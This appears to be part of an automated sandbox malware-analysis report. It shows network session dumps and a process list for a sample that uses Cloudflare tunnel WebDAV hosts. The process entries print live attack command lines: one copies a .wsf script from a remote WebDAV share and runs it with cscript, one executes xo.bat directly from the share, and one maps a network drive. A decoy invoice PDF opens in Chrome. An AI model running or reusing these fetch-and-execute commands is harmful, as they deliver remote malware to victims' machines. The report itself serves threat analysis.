            10192.168.2.1053119104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:51 UTC222OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 5f 74 72 61 63 65 33 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /syscalls/amsi_trace32.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
            2025-03-13 10:07:52 UTC226INHTTP/1.1 404 Not Found
            Date: Thu, 13 Mar 2025 10:07:51 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91faba0cbcd2345c-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:52 UTC418INData Raw: 31 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34
            Data Ascii: 19b<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.1053122104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:53 UTC222OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 5f 74 72 61 63 65 33 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /syscalls/amsi_trace32.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
            2025-03-13 10:07:54 UTC226INHTTP/1.1 404 Not Found
            Date: Thu, 13 Mar 2025 10:07:54 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91faba1afd616c81-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:54 UTC418INData Raw: 31 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34
            Data Ascii: 19b<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.1053124104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:54 UTC211OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:54 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:54 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 824
            Connection: close
            CF-Ray: 91faba1d7ade69c0-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:54 UTC824INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.1053125162.159.134.424437752C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:54 UTC663OUTGET /favicon.ico HTTP/1.1
            Host: www.healyconsultants.com
            Connection: keep-alive
            sec-ch-ua-platform: "Windows"
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
            2025-03-13 10:07:54 UTC178INHTTP/1.1 403 Forbidden
            Server: cloudflare
            Date: Thu, 13 Mar 2025 10:07:54 GMT
            Content-Type: text/html
            Content-Length: 553
            Connection: close
            CF-RAY: 91faba1f5fbee595-DFW
            2025-03-13 10:07:54 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.1053130104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:56 UTC200OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
            2025-03-13 10:07:56 UTC226INHTTP/1.1 404 Not Found
            Date: Thu, 13 Mar 2025 10:07:56 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91faba297e28f078-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:56 UTC396INData Raw: 31 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34
            Data Ascii: 185<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4
            2025-03-13 10:07:56 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.1053131104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:56 UTC211OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:57 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:57 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 824
            Connection: close
            CF-Ray: 91faba2cab68e7f3-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:57 UTC824INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:8
            Start time:06:07:34
            Start date:13/03/2025
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
            Imagebase:0x7ff73e210000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:06:07:34
            Start date:13/03/2025
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff60c8c0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:16
            Start time:06:07:39
            Start date:13/03/2025
            Path:C:\Windows\System32\cscript.exe
            Wow64 process (32bit):false
            Commandline:cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
            Imagebase:0x7ff70b5b0000
            File size:161'280 bytes
            MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:17
            Start time:06:07:40
            Start date:13/03/2025
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat
            Imagebase:0x7ff73e210000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:18
            Start time:06:07:40
            Start date:13/03/2025
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff60c8c0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:19
            Start time:06:07:45
            Start date:13/03/2025
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
            Imagebase:0x7ff7ea9f0000
            File size:3'388'000 bytes
            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:20
            Start time:06:07:46
            Start date:13/03/2025
            Path:C:\Windows\System32\net.exe
            Wow64 process (32bit):false
            Commandline:net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
            Imagebase:0x7ff7c5d30000
            File size:59'904 bytes
            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:22
            Start time:06:07:47
            Start date:13/03/2025
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3
            Imagebase:0x7ff7ea9f0000
            File size:3'388'000 bytes
            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:27
            Start time:06:07:56
            Start date:13/03/2025
            Path:C:\Windows\System32\net.exe
            Wow64 process (32bit):false
            Commandline:net use Z: /delete /yes
            Imagebase:0x7ff7c5d30000
            File size:59'904 bytes
            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            No disassembly